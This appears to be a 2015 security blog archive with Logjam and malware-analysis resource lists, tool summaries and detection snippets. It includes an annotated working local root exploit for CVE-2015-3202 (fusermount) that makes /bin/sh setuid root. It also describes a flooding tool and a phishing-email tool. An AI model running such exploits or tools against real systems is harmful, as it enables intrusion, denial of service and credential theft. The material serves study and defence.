May 22, 2015

Resources for the Logjam vulnerability (TLS downgrade to export-grade Diffie-Hellman)

http://www.cryptologie.net/article/270/the-logjam-attack/
https://www.virusbtn.com/blog/2015/05_20.xml
https://weakdh.org/

Detection
https://openssl.org/blog/blog/2015/05/20/logjam-freak-upcoming-changes/
https://danielmiessler.com/blog/check-logjam-nmap/
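As an added check (editor's example, not code from any of the pages linked above), the following POSIX shell snippet asks a server for a DHE handshake with openssl s_client and classifies the Diffie-Hellman group size from the "Server Temp Key" line that OpenSSL 1.0.2 and later print. The thresholds are assumptions taken from the weakdh.org guidance: a group of 512 bits or less is export-grade (what the Logjam downgrade lands on), anything below 2048 bits is weak, 2048 bits or more is acceptable. The host and port are whatever you pass to check_logjam.

```shell
#!/bin/sh
# Added example: classify a TLS server's ephemeral DH group size.
# Assumes an OpenSSL client >= 1.0.2, which prints "Server Temp Key: DH, N bits"
# when a finite-field DHE suite is negotiated.

# classify_dh: read `openssl s_client` output on stdin and print one of
#   EXPORT  (<= 512 bits: the group size Logjam downgrades a connection to)
#   WEAK    (< 2048 bits: 768/1024-bit groups, within reach of a well-funded adversary)
#   OK      (>= 2048 bits)
#   NO-DHE  (no finite-field DHE negotiated: ECDHE, RSA key exchange, or no Temp Key line)
classify_dh() {
    bits=$(sed -n 's/^Server Temp Key: DH, \([0-9][0-9]*\) bits.*$/\1/p' | head -n 1)
    if [ -z "$bits" ]; then
        echo NO-DHE
    elif [ "$bits" -le 512 ]; then
        echo EXPORT
    elif [ "$bits" -lt 2048 ]; then
        echo WEAK
    else
        echo OK
    fi
}

# check_logjam HOST [PORT]: offer only DHE suites so that the Temp Key line
# reflects the server's own DH group, then classify it. A server that refuses
# every DHE suite yields NO-DHE and is not exposed to this particular downgrade.
check_logjam() {
    host=$1
    port=${2:-443}
    printf 'QUIT\n' | openssl s_client -connect "$host:$port" -cipher 'EDH' 2>/dev/null \
        | classify_dh
}

# Usage: check_logjam www.example.com        # prints EXPORT, WEAK, OK or NO-DHE
```

With an OpenSSL 1.1.1 or newer client add -tls1_2 to the s_client call, otherwise a server that speaks TLS 1.3 will negotiate an elliptic-curve group (finite-field DHE does not exist in TLS 1.3) and the result is NO-DHE regardless of how the server's TLS 1.2 DH parameters look. The nmap route in the second link above covers many hosts at once; this snippet is for a quick look at one server.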

(By taviso) Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;
 
# $b is used twice, first to build the contents of shellscript $a, and then as
# a command to make $a executable. Quotes are unused to save a character, so
# the separator must be escaped.
b=chmod\ u+sx;
 
# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
# and dont make it drop privileges.
#
# http://www.openwall.com/lists/oss-security/2013/08/22/12
#
echo $b /bin/sh>$a;
 
# Now make the $a script executable using the command in $b. This needlessly
# sets the setuid bit, but that doesn't do any harm.
$b $a;
 
# Now make $a the directory we want fusermount to use. This directory name is
# written to an arbitrary file as part of the vulnerability, so needs to be
# formed such that it's a valid shell command.
a+=\;$a;
 
# Create the mount point for fusermount.
mkdir -p $a;
 
# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
# /bin/mount so that it can use privileged mount options that are normally
# restricted if ruid != euid. That's acceptable (but scary) in theory, because
# fusermount can sanitize the call to make sure it's safe.
#
# However, because mount thinks it's being invoked by root, it allows
# access to debugging features via the environment that would not normally be
# safe for unprivileged users and fusermount doesn't sanitize them.
#
# Therefore, the bug is that the environment is not cleared when calling mount
# with ruid=0. One debugging feature available is changing the location of
# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
# files.
#
# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
# current shell from $0...so it only works if you're using bash!).
#
# The line written by fusermount will look like this:
#
# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
#
# Which will try to execute /dev/fuse with the parameter /tmp/_, fail because
# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
# next time root logs in.
#
# Another way to exploit it would be overwriting /etc/default/locale, then
# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
# wouldn't have to log in, but you would have to wait around until midnight to
# check if it worked.
#
# And we have enough characters left for a hash tag/comment.
LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202 
 

May 19, 2015

Tools: SQLassie - database firewall

SQLassie is a database firewall that detects and prevents SQL injection attacks at runtime.

Usage

SQLassie currently only supports MySQL. To start SQLassie you configure how it connects to the MySQL server, start it listening on a separate, now protected, port, and then point your applications at that port instead of at MySQL directly.
As an example, consider a host where MySQL is listening on the Unix domain socket /var/run/mysql/mysqld.sock and a MediaWiki installation uses it.
First, start SQLassie with
./sqlassie -s /var/run/mysql/mysqld.sock -l 3307
Then edit MediaWiki's configuration file LocalSettings.php so that it connects to port 3307:
$wgDBServer = "127.0.0.1:3307";
Note that you cannot use localhost here: by default the MySQL client library interprets localhost as a request to connect over the Unix domain socket rather than TCP, and most web applications inherit that behaviour, which would bypass SQLassie entirely. Use the explicit string 127.0.0.1 to force a TCP connection, and check your application's documentation for details.

Source:: https://github.com/bskari/sqlassie

Tools: WIG - WebApp Information Gatherer

wig is a web application information gathering tool that can identify numerous content management systems (CMSes) and other administrative applications.
Fingerprinting is based on checksums and string matching of known files for different versions of each CMS. A score is calculated for each detected CMS and its versions, based on weights and the number of "hits" for a given checksum, and each detected CMS is displayed together with its most probable version(s).
wig also tries to guess the server's operating system from the 'Server' and 'X-Powered-By' headers. A database of known header values for different operating systems is bundled with wig, which lets it guess Microsoft Windows versions as well as Linux distributions and versions.

wig features:
  • CMS version detection by checksums, string matching and extraction
  • Lists detected package and platform versions such as ASP.NET, PHP, OpenSSL and Apache
  • Detects JavaScript libraries
  • Operating system fingerprinting by matching PHP, Apache and other package versions against values in wig's database
  • Checks for files of interest such as administrative login pages, readmes, etc.
  • wig's databases currently hold 28,000 fingerprints
  • Reuses information from previous runs (cached results)
  • Verbose output option
  • No dependency on the 'requests' library
  • Proxy support
  • Proper threading support
  • Checks for known vulnerabilities in the detected versions
Source:: https://github.com/jekyc/wig

Tools: Java LOIC - Low Orbit Ion Cannon. A Java based network stress testing application

Low Orbit Ion Cannon. The project is a Java implementation of LOIC, originally written by Praetox, but it is not related to the original project. The stated purpose of Java LOIC is stress-testing your own network; like any flooding tool, point it only at infrastructure you are authorised to test.

Java LOIC should work on most operating systems.

Source:: http://sourceforge.net/projects/javaloic/

May 18, 2015

Howto: Install Parallels Tools (Parallels Desktop 10) in Kali 1.1.0a

1. Install Kali

2. Download libc-bin, libc6 and locales (Debian jessie builds; they are fetched over plain HTTP and installed with dpkg, which bypasses apt's signature checks, so use a mirror you trust)
$ wget "http://ftp.tw.debian.org/debian/pool/main/g/glibc/libc-bin_2.19-18_amd64.deb"
$ wget "http://ftp.us.debian.org/debian/pool/main/g/glibc/libc6_2.19-18_amd64.deb"
$ wget "http://ftp.cn.debian.org/debian/pool/main/g/glibc/locales_2.19-18_all.deb"

3. Install libc package
$ dpkg -B -i libc-bin_2.19-18_amd64.deb libc6_2.19-18_amd64.deb locales_2.19-18_all.deb

4. Download the remaining packages

libtirpc1_0.2.5-1_amd64.deb nfs-common_1.2.8-9_amd64.deb libgssapi-krb5-2_1.12.1+dfsg-19_amd64.deb libkrb5-3_1.12.1+dfsg-19_amd64.deb libkrb5support0_1.12.1+dfsg-19_amd64.deb libkeyutils1_1.5.9-5+b1_amd64.deb libk5crypto3_1.12.1+dfsg-19_amd64.deb

5. Install all of them.
$ dpkg -i libtirpc1_0.2.5-1_amd64.deb nfs-common_1.2.8-9_amd64.deb libgssapi-krb5-2_1.12.1+dfsg-19_amd64.deb libkrb5-3_1.12.1+dfsg-19_amd64.deb libkrb5support0_1.12.1+dfsg-19_amd64.deb libkeyutils1_1.5.9-5+b1_amd64.deb libk5crypto3_1.12.1+dfsg-19_amd64.deb

6. Install Parallels Tools
Action -> Install Parallels Tools

7. Copy the installer from the mounted CD-ROM image (the ISO contains subdirectories, so copy recursively)
$ mkdir /mnt/tool
$ cp -r /media/cdrom/* /mnt/tool

8. Make the installers executable
$ cd /mnt/tool
$ chmod +x install install-gui

9. Run the installer
$ ./install

10. Done

Tools: PyPhisher – Python Tool for Phishing

Tools for running a phishing campaign come in several forms. Phishing tests can be used during a penetration test or a security awareness program to show users the kind of attack real adversaries use to compromise credentials.
If you want to run a phishing test or demonstration, have a look at PyPhisher. This Python tool lets the user send emails built from a customized HTML template: you can take an HTML page that mimics any organization and replace its links with the ones you want the target to follow.
The following options are required:
  • --server: the SMTP server used to send the email
  • --port: the SMTP port on that server
  • --html: the pre-crafted HTML file used as the email body
  • --url_replace: the URL to substitute for the links in the template
  • --subject: the subject line of the email
  • --sender: the sender name/address that appears on the email
  • --sendto: the recipient of the email
According to the author, PyPhisher was inspired by SpearPhisher beta by Dave Kennedy of TrustedSec and by a feature in Cobalt Strike by Raphael Mudge of Strategic Cyber.

Source:: http://www.sectechno.com/pyphisher-python-tool-for-phishing/

Tools: ashttp - Shell command to expose any other command as http.

ashttp provides a simple way to expose any shell command over HTTP. For example, to expose top over HTTP run ashttp -p8080 top and then open http://localhost:8080. Whoever can reach that port is driving a command that runs with your privileges, so keep it off untrusted networks.

Source:: http://julienpalard.github.io/ashttp/

May 17, 2015

Resources for malware analysis

Malware website list
- http://www.malwaredomainlist.com/mdl.php
- quttera.com/lists/malicious
- www.malwaredomains.com
- malware-traffic-analysis.net
- http://malwareconfig.com/
- http://malwaretips.com/
- http://support.clean-mx.de/clean-mx/viruses
- https://zeltser.com/malware-sample-sources/
- http://www.malwareblacklist.com/showMDL.php
- http://www.selectrealsecurity.com/public-block-lists
- http://malc0de.com/database/


Malware sample sources
- http://www.malwaredigger.com
- https://www.hybrid-analysis.com
- http://malware.dontneedcoffee.com/
- http://blog.malwaremustdie.org/
- http://contagiodump.blogspot.com/
- http://malshare.com/
- http://www.kernelmode.info/forum/viewforum.php?f=16
- http://www.malware.lu/articles/
- http://www.tekdefense.com/downloads/malware-samples/
- http://ytisf.github.io/theZoo/
- https://malwr.com/
- http://syrianmalware.com/
- malwareconfig.com
- http://www.virusign.com/
- http://virusshare.com/


C&C List
- http://cybercrime-tracker.net/

Resource hub
- https://github.com/rshipp/awesome-malware-analysis

Example of memory analysis with Volatility against malware
- https://tribalchicken.com.au/security/hunting-malware-through-memory-analysis/#more-950


Microsoft Word Intruder (MWI) analysis
http://blog.0x3a.com/post/117760824504/analysis-of-a-microsoft-word-intruder-sample

OS X Malware Sample
- https://objective-see.com/malware.html

Malicious domain and IP blocklists
- https://zeltser.com/malicious-ip-blocklists/


Online sandboxes and analysis services
  • Anubis: http://anubis.iseclab.org
  • Comodo: http://camas.comodo.com
  • Malwr: https://malwr.com/submission
  • Threat Expert: http://www.threatexpert.com/submit.aspx
  • Threat Track: http://www.threattracksecurity.com/resources/sandbox-malware-analysis.aspx
  • Vicheck: https://www.vicheck.ca
  • AVCaesar: https://avcaesar.malware.lu/
  • Overview of automated services: https://zeltser.com/automated-malware-analysis/

URL analysis websites
  • <a>AVG LinkScanner Drop Zone</a>: Analyzes the URL in real time for threats (http://www.avg.com.au/resources/web-page-scanner/)
  • <a>BrightCloud URL/IP Lookup</a>: Presents historical reputation data about the website (http://www.brightcloud.com/support/lookup.php)
  • <a>Comodo Web Inspector</a>: Examines the URL in real-time. (http://app.webinspector.com/)
  • <a>Cisco SenderBase</a>: Presents historical reputation data about the website (http://www.senderbase.org/)
  • <a>Cyscon SIRT</a>: Provides historical data for IP addresses, domains and ASNs. (http://www.cyscon-sirt.org/)
  • <a>Is It Hacked</a>: Performs several of its own checks of the URL in real time and consults some blacklists (http://www.isithacked.com/)
  • <a>Norton Safe Web</a>: Presents historical reputation data about the website (http://safeweb.norton.com/)
  • <a>PhishTank</a>: Looks up the URL in its database of known phishing websites (http://www.phishtank.com/)
  • <a>Quttera ThreatSign</a>: Scans the specified URL for the presence of malware (http://quttera.com/)
  • <a>Reputation Authority</a>: Shows reputational data on specified domain or IP address (http://www.reputationauthority.org/)
  • <a>Trend Micro Web Reputation</a>: Presents historical reputation data about the website (http://reclassify.wrs.trendmicro.com/)
  • <a>Unmask Parasites</a>: Looks up the URL in the Google Safe Browsing database  (http://www.unmaskparasites.com/security-report/)
  • <a>URLVoid</a>: Looks up the URL in several website blacklisting services (http://urlvoid.com/)
  • <a>VirusTotal</a>: Looks up the URL in several databases of malicious sites (https://www.virustotal.com/)
  • <a>vURL</a>: Retrieves and displays the source code of the page; looks up its status in several blocklists (http://vurl.mysteryfcm.co.uk/)
  • <a>Wepawet</a>: Analyzes the URL in real time for threats (http://wepawet.iseclab.org/)
  • <a>Zscaler Zulu URL Risk Analyzer</a>: Examines the URL using real-time and historical techniques (http://zulu.zscaler.com/)
From: https://zeltser.com/lookup-malicious-websites/


https://www.youtube.com/playlist?list=PLUFkSN0XLZ-kqYbGpY4Gt_VATd4ytQg-Z
http://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-bsideslv-on-august-5-2014

Tips for dynamic analysis
In Process Monitor, filter on the operations "WriteFile" and "RegSetValue". These are usually the calls a malicious executable makes to write its payload to disk and to change the registry (for example to add a Run-key entry for persistence).
In Process Explorer, double-clicking a process yields more information about it. The important attributes are:
  1. Verify button. Every process's properties page has a Verify option that checks whether the image is signed by Microsoft (or another trusted publisher). In the screenshot below, the binary is not signed by Microsoft.
  2. Threads tab. Shows the threads belonging to the process.
  3. Strings tab. Helps determine whether process replacement (hollowing) has occurred: it lists the strings found in the image on disk and in the image in memory, and if the two sets differ drastically the in-memory code has probably been replaced. The screenshot below compares the strings of the executable on disk and in memory.
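The WriteFile / RegSetValue filter above is usually applied in the Process Monitor GUI, but when a run produces tens of thousands of events it is handier to save the capture as CSV and filter it on the command line. The following POSIX shell snippet is an added example by the editor, not from the page's source material: it pulls the file-drop and registry-write events of one process out of a Procmon CSV export. The sample export embedded in it is constructed for illustration (a dropper copying itself to %APPDATA% and registering under the Run key, plus explorer.exe noise), and the snippet assumes Procmon's default column order and that no field contains the three-character sequence "," (true for the columns used here).

```shell
#!/bin/sh
# Added example: filter a Process Monitor CSV export (File > Save..., CSV format)
# down to the WriteFile and RegSetValue events of one process.
# Assumes the default Procmon columns:
#   "Time of Day","Process Name","PID","Operation","Path","Result","Detail"
# Every field is double-quoted, so splitting on the literal sequence  ","  is
# enough as long as no field itself contains that sequence (the assumption here).

# persistence_events PROCNAME: read the CSV on stdin; print PID, operation and
# path (tab separated) for every WriteFile / RegSetValue row of PROCNAME.
persistence_events() {
    awk -F'","' -v proc="$1" '
        NR > 1 && $2 == proc && ($4 == "WriteFile" || $4 == "RegSetValue") {
            printf "%s\t%s\t%s\n", $3, $4, $5
        }'
}

# Constructed sample export, NOT a real capture. Single quotes keep the
# backslashes literal.
SAMPLE_CSV='"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1000000","sample.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
"10:01:02.2000000","sample.exe","1234","WriteFile","C:\Users\victim\AppData\Roaming\svch0st.exe","SUCCESS","Offset: 0, Length: 40,960"
"10:01:02.3000000","sample.exe","1234","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svch0st","SUCCESS","Type: REG_SZ, Length: 84, Data: C:\Users\victim\AppData\Roaming\svch0st.exe"
"10:01:02.4000000","explorer.exe","800","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:01:02.5000000","explorer.exe","800","WriteFile","C:\Users\victim\AppData\Local\IconCache.db","SUCCESS","Offset: 0, Length: 512"'

# Usage with a real export:   persistence_events sample.exe < Logfile.CSV
# Run against the constructed sample (prints the two dropper events):
printf '%s\n' "$SAMPLE_CSV" | persistence_events sample.exe
```

Filtering by process name is what keeps the noise down: explorer.exe also issues WriteFile calls (its IconCache.db write in the sample), so the same function run with explorer.exe as the argument returns that single benign event, while sample.exe returns the dropped copy and the Run-key entry that point to the same path, which is the pattern worth chasing in the Strings tab afterwards.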